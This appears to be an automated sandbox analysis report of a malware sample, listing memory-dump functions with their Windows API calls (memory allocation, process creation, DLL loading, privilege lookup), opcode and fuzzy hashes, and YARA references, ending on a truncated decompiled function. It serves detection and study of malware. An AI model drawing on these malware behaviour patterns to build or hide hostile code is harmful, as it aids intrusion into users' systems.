Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f42655c4d153370407424d458f51295f197e2c33ffc9768a1b64b029253191a6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 51F0B7B2210208AFDB14DF89DC90EEB77ADEF8C754F158258BE1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A10A, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E32D11,00002000,00003000,00000004), ref: 02E4A149

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bc09102059a3649b6dc9c5aff46b22fa5e22dc0d1532014938a038aa2b3b6795
Instruction ID: fc7567f500bae3a01eb287b86b4e63fb79efa6e87ea3fad434367ce071e13a7a
Opcode Fuzzy Hash: bc09102059a3649b6dc9c5aff46b22fa5e22dc0d1532014938a038aa2b3b6795
Instruction Fuzzy Hash: F0F0F8B2250218ABDB14DF88DC91EA777ADAF88354F118659FA18A7351CA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E32D11,00002000,00003000,00000004), ref: 02E4A149

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: d21ed99e002ed9ba9f23732282183e7debf676f485ef6f3b62567ef22489d2c4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: FAF015B2210208ABDB14DF89DC90EAB77ADAF88750F118258BE0897241C630F811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02E44D20,?,?,02E44D20,00000000,FFFFFFFF), ref: 02E4A085

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 614c44dceef6ceaf21b14b84550511f909142021dafb3bf7c16a1964c629cd09
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5ED012752402146BD710EB98DC55F97775DEF44760F154555BA185B241C530F50087E0

Uniqueness

Uniqueness Score: -1.00%

Function 03729A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03729A5A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 659bd2130618adbc4a8d1dee6164bd8ecdfff56531f6e365d18c9120982a0fc8
Instruction ID: dedbc3a46c060c094153c850d124393729cd7b819ba650ec28e9b16b089f9ce5
Opcode Fuzzy Hash: 659bd2130618adbc4a8d1dee6164bd8ecdfff56531f6e365d18c9120982a0fc8
Instruction Fuzzy Hash: 7690026122184446E210A5694C14B07004597D5343F51C125A0144654DCB5588717561

Uniqueness

Uniqueness Score: -1.00%

Function 03729910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372991A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27ccc75ea5fb27ad4bbc5a99193009aa50f66ab13a3b882674258904b4a788ab
Instruction ID: fe8f9fab6385a9ef5f269639cfc0dde29e9e40de6f8a5be569b7a678da12121c
Opcode Fuzzy Hash: 27ccc75ea5fb27ad4bbc5a99193009aa50f66ab13a3b882674258904b4a788ab
Instruction Fuzzy Hash: 049002B121104806E150B1594404746004597D5342F51C021A5054654F87998DE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 037299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037299AA

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62f291f228a2bd109bbf453bb1890aaaac5d3c7e832f6ba0007ec398773dc52f
Instruction ID: 3579db0035104dbba8cb34fd35d1cb85d2f75300cd048a4d158a59e7f47e7f31
Opcode Fuzzy Hash: 62f291f228a2bd109bbf453bb1890aaaac5d3c7e832f6ba0007ec398773dc52f
Instruction Fuzzy Hash: 6A9002A135104846E110A1594414B060045D7E6342F51C025E1054654E8759CC627166

Uniqueness

Uniqueness Score: -1.00%

Function 03729860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372986A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4ef9239ef5e232960b54d2fb94797ab3ed0f9d67cbad8705d9b248967685666
Instruction ID: 2ecc47ca3b9ced7db701df9261d12b92a833ae90327fd8bd142a5c454180d664
Opcode Fuzzy Hash: c4ef9239ef5e232960b54d2fb94797ab3ed0f9d67cbad8705d9b248967685666
Instruction Fuzzy Hash: A790027121104817E121A1594504707004997D5282F91C422A0414658E97968962B161

Uniqueness

Uniqueness Score: -1.00%

Function 03729840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372984A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b71be9cccbf524388bc59ef5d41dc1769790f735937419cab7b3f42d2ee3916b
Instruction ID: bd09f0f761c02d12c9ee47d276e2560cf6a7e361b7794f554cdbcb58306d5071
Opcode Fuzzy Hash: b71be9cccbf524388bc59ef5d41dc1769790f735937419cab7b3f42d2ee3916b
Instruction Fuzzy Hash: A9900261252085566555F15944045074046A7E5282791C022A1404A50D87669866F661

Uniqueness

Uniqueness Score: -1.00%

Function 03729710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372971A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae3297e52c132d3c8bd255b87eaa6ba81c5747715ceeeb90e279117d7a9179f2
Instruction ID: 0c25cbb69e018ea8ba9ebd5108d6992fbad387a2239959ce215681991106cf3c
Opcode Fuzzy Hash: ae3297e52c132d3c8bd255b87eaa6ba81c5747715ceeeb90e279117d7a9179f2
Instruction Fuzzy Hash: B290027121104806E110A5995408646004597E5342F51D021A5014655FC7A588A17171

Uniqueness

Uniqueness Score: -1.00%

Function 03729FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03729FEA

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62ebdc6cfa0660cd05d549f45629391b021867e832c412736ad3f240684a04f1
Instruction ID: 52f62b49c489ff11d0f2d2b00174eccbbf8be4bb4d695bc748f46ee32914dcbb
Opcode Fuzzy Hash: 62ebdc6cfa0660cd05d549f45629391b021867e832c412736ad3f240684a04f1
Instruction Fuzzy Hash: 5990027132118806E120A1598404706004597D6242F51C421A0814658E87D588A17162

Uniqueness

Uniqueness Score: -1.00%

Function 03729780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372978A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 294d941a3f3ade6510c82cf31510886e19f7466ac40cadd14f2abaf1f859c417
Instruction ID: f94124e1260163f622133ad96088c328b3edbf1d259483a7dff02a65589c8e87
Opcode Fuzzy Hash: 294d941a3f3ade6510c82cf31510886e19f7466ac40cadd14f2abaf1f859c417
Instruction Fuzzy Hash: AA90026922304406E190B159540860A004597D6243F91D425A0005658DCB5588797361

Uniqueness

Uniqueness Score: -1.00%

Function 03729660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372966A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc362c337a41d0e4a19c17f28411fce67f736a68bbd38c8d6409cf118728940a
Instruction ID: 34eed8013b66490284c439d4a03876ed9a847baa915463429807f8f353cc3864
Opcode Fuzzy Hash: fc362c337a41d0e4a19c17f28411fce67f736a68bbd38c8d6409cf118728940a
Instruction Fuzzy Hash: BB90027121104C06E190B159440464A004597D6342F91C025A0015754ECB558A6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03729650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372965A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33c7e8da9688339da6a94b22acbae6ef3f3f1592b7c27e5ecd958b58f3621cb0
Instruction ID: 5896023fd86a4a13adf8c6e0e9f72eb96e767c8dd93af954e7d6e2e30fcf2ba4
Opcode Fuzzy Hash: 33c7e8da9688339da6a94b22acbae6ef3f3f1592b7c27e5ecd958b58f3621cb0
Instruction Fuzzy Hash: E590027121508C46E150B1594404A46005597D5346F51C021A0054794E97658D65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 037296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037296EA

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 271a1ca8a5d79a46b679c73866e16953addc94261388282aa1d065f0a7ab6a7c
Instruction ID: c4120b944fbd0bce851f1ecaf8058fd1d41a9fbafabdadbb668fdd082f669d7f
Opcode Fuzzy Hash: 271a1ca8a5d79a46b679c73866e16953addc94261388282aa1d065f0a7ab6a7c
Instruction Fuzzy Hash: 9D9002712110CC06E120A159840474A004597D5342F55C421A4414758E87D588A17161

Uniqueness

Uniqueness Score: -1.00%

Function 037296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037296DA

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52bc4792b44fefee00ffe8ffe1825d16378514df74db2605f9d7056da3ab35b5
Instruction ID: 09ade674c650c57d41335ba05fef02b8dbbea7e62722c47b9bbaf1beff728ce6
Opcode Fuzzy Hash: 52bc4792b44fefee00ffe8ffe1825d16378514df74db2605f9d7056da3ab35b5
Instruction Fuzzy Hash: F590027121104C46E110A1594404B46004597E5342F51C026A0114754E8755C8617561

Uniqueness

Uniqueness Score: -1.00%

Function 03729540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0372954A

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e8368c9e27a13996a98fba9b954e626bd847bacc5a235da4863a8278996b8fd
Instruction ID: f0e17379c427f9e6b129fac2516c12387c015bf0485d6e645f05f858c0a71f8f
Opcode Fuzzy Hash: 9e8368c9e27a13996a98fba9b954e626bd847bacc5a235da4863a8278996b8fd
Instruction Fuzzy Hash: 5F900265221044071115E5590704507008697DA392351C031F1005650DD76188717161

Uniqueness

Uniqueness Score: -1.00%

Function 037295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037295DA

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ce008134a8d6274ddb320fd99d936740713ab812affd4deed663ce4dc307d20
Instruction ID: 627d868a9be468f916fc960b9d98a90ae696c74d978cc73a1c265a8beed7a109
Opcode Fuzzy Hash: 4ce008134a8d6274ddb320fd99d936740713ab812affd4deed663ce4dc307d20
Instruction Fuzzy Hash: EC9002A1212044075115B1594414616404A97E5242B51C031E1004690EC76588A17165

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A2AD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54processmemoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E33AF8), ref: 02E4A26D
CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E4A304

Strings

.z`, xrefs: 02E4A268

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: CreateFreeHeapInternalProcess
String ID: .z`
API String ID: 1438695366-1441809116
Opcode ID: a4dfc2fb55fef3a25595ad1675b1d5f66c47844291590072b20ff3db10ab3ee9
Instruction ID: 513cd09e3e6a65f9b90269e5574a5b4480065fd77f28cf56951e21b92eb24822
Opcode Fuzzy Hash: a4dfc2fb55fef3a25595ad1675b1d5f66c47844291590072b20ff3db10ab3ee9
Instruction Fuzzy Hash: F901D3B2250108BFCB14DF89DC90EEB73ADAF8C754F118258FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E48C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02E48CF8

Strings

wininet.dll, xrefs: 02E48CAE, 02E48CB7
net.dll, xrefs: 02E48CC1, 02E48D47, 02E48D1F, 02E48D2B, 02E48D53

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 63872ab21d674b5aff70cbdc6cb63e36e278d6aeb38d72c9de718cf8879fd541
Instruction ID: 9046d0d9f8016881585c53e87ba06a0ee3a8b57803e5ee3c55933f8cb677eb5e
Opcode Fuzzy Hash: 63872ab21d674b5aff70cbdc6cb63e36e278d6aeb38d72c9de718cf8879fd541
Instruction Fuzzy Hash: 253190B2541244BBC724EF64DC84FA7B7B9BF88704F00851DF629AB281DB30B650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E48C46, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02E48CF8

Strings

wininet.dll, xrefs: 02E48CAE, 02E48CB7
net.dll, xrefs: 02E48CC1, 02E48D1F, 02E48D2B

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: feef5257646831c232bf0e5ba95a545ef1bc0cf5defdd6eed7a7b5078af4443f
Instruction ID: 12ee46335e55a6543d8af1ef2844726e964057275c5feb0aff383829b9a744ae
Opcode Fuzzy Hash: feef5257646831c232bf0e5ba95a545ef1bc0cf5defdd6eed7a7b5078af4443f
Instruction Fuzzy Hash: 1C2181B1541244BBC720DF64DC85BA7BBB5EF48704F00941DE6196B241DB71A550CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E33AF8), ref: 02E4A26D

Strings

.z`, xrefs: 02E4A25C, 02E4A268

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 2299af47bd9b96ca03facdb0da489000fd687081cd1a2fc85597d4ef4c2c7bd1
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: AAE01AB12502046BD714DF59DC54EA777ADAF88750F018554B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02E382F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E3834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E3836B

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 15edbb4cc3d26cb838ba770935acbef79736b7c7eae0e36945157479f91564d0
Instruction ID: b91070a219fa282987a2e7302494fb86d114831b70241d95ca3edaa5b372629b
Opcode Fuzzy Hash: 15edbb4cc3d26cb838ba770935acbef79736b7c7eae0e36945157479f91564d0
Instruction Fuzzy Hash: DE012B31AC03287BEB21A6949C42FFF772C6B40B55F058019FF04BA2C0EAD4690687F5

Uniqueness

Uniqueness Score: -1.00%

Function 02E3ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02E3AD32

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
Instruction ID: 78167ce99353f05b53fe8f89ffa1a7edf5920f1f28f41766ab9642750eda94a9
Opcode Fuzzy Hash: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
Instruction Fuzzy Hash: 13011EB5E8020DBBDB10EAE4EC45FDDB379AB44309F1095A5E90897241FA31E754CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E4A304

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: b7aa0a151ab8b0e591ef8527d6c92e29c0addb1c8b3745bdf60194d67427d075
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: DD01B2B2210108BFCB54DF89DC90EEB77AEAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E48D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02E3F020,?,?,00000000), ref: 02E48DBC

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 3c0ee52673207ab14f80c8bdb959fbe4a9a70b0b5f481b96ae6e1af18ef8fa61
Instruction ID: 7b11c58cf6ad3a7ac1edd7b6ed6219f143348f77648667d1000015d818aadad7
Opcode Fuzzy Hash: 3c0ee52673207ab14f80c8bdb959fbe4a9a70b0b5f481b96ae6e1af18ef8fa61
Instruction Fuzzy Hash: A7E06D333913043AE3206599AC02FA7B39C9B91B25F544026FA0DEA2C1D995F40146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A392, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E3F1A2,02E3F1A2,?,00000000,?,?), ref: 02E4A3D0

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bb15099bf8a80e1221deca262ca24380d91a5b556691ce1360fcc1633518828c
Instruction ID: 1f654636b30bada146b19701a68b6915fcdcc64863f2297a7b797a70444132dc
Opcode Fuzzy Hash: bb15099bf8a80e1221deca262ca24380d91a5b556691ce1360fcc1633518828c
Instruction Fuzzy Hash: A2E0EDB1A002046BCB24DF54CC84EDB73AAAF88210F108168FD085B200CA30E8108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02E44506,?,02E44C7F,02E44C7F,?,02E44506,?,?,?,?,?,00000000,00000000,?), ref: 02E4A22D

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ed651733003f06b3df8374637d7a8ca7a89f26391f09db93deb489063bb30e5b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: C3E012B1250208ABDB14EF99DC50EA777ADAF88660F118558BA085B241CA30F9118BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02E4A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E3F1A2,02E3F1A2,?,00000000,?,?), ref: 02E4A3D0

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 2c298fffcdc03a979c7a6186e0cd84a5d7666e2bb8cec69a00f757528f267ce4
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 72E01AB12402086BDB10DF49DC94EE737ADAF88650F018164BA0857241C930E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02E3F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02E38CF4,?), ref: 02E3F6CB

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: d3a7e822e76ada3983a0da17e8afff93e97bb6216403e4e11105e25922a71356
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: F3D0A7717D03043BE610FAA49C07F2733CD6B44B05F494064FA48DB3C3DD50E0008565

Uniqueness

Uniqueness Score: -1.00%

Function 0372967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03729694

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ccf7f7cc6932ac23416b1a8e82b375af5a6e270f900102e274123d3609e42592
Instruction ID: 13e4a64520ecc52eccde83cc4235a2b78edaeaec9f407668fe3aa1571803474b
Opcode Fuzzy Hash: ccf7f7cc6932ac23416b1a8e82b375af5a6e270f900102e274123d3609e42592
Instruction Fuzzy Hash: 61B09B719014D5CDE611D76046087177D4477D5741F1AC071D2020741B4778C0A5F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0377FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0377FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
